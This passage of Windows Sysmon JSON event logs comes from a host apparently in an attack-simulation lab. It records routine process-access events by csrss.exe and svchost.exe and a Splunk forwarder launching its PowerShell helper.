C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1367-5F25-0000-001012890E00}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.544","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1367-5F25-0000-001012890E00}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8296,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.544\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1367-5F25-0000-001012890E00}\r\nTargetProcessId: 4960\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.544","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1367-5F25-0000-001012890E00}","TargetProcessId":"4960","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":8297,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.795\r\nProcessGuid: {E2A3D6B1-1367-5F25-0000-00106F8C0E00}\r\nProcessId: 3616\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nFileVersion: ?\r\nDescription: ?\r\nProduct: ?\r\nCompany: ?\r\nOriginalFileName: ?\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {E2A3D6B1-1058-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C\r\nParentProcessGuid: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nParentProcessId: 1828\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.795","ProcessGuid":"{E2A3D6B1-1367-5F25-0000-00106F8C0E00}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","FileVersion":"?","Description":"?","Product":"?","Company":"?","OriginalFileName":"?","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\" --ps2","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-00101A740500}","ParentProcessId":"1828","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8298,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.794\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-00101A740500}\r\nSourceProcessId: 1828\r\nSourceThreadId: 1376\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {E2A3D6B1-1367-5F25-0000-00106F8C0E00}\r\nTargetProcessId: 3616\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.794","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-00101A740500}","SourceProcessId":"1828","SourceThreadId":"1376","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{E2A3D6B1-1367-5F25-0000-00106F8C0E00}","TargetProcessId":"3616","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8299,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.794\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1367-5F25-0000-00106F8C0E00}\r\nTargetProcessId: 3616\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.794","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1367-5F25-0000-00106F8C0E00}","TargetProcessId":"3616","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8300,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.794\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.794","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8301,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.794\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.794","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8302,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.794\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.794","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:59","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8303,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:59.794\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:59.794","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:00","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
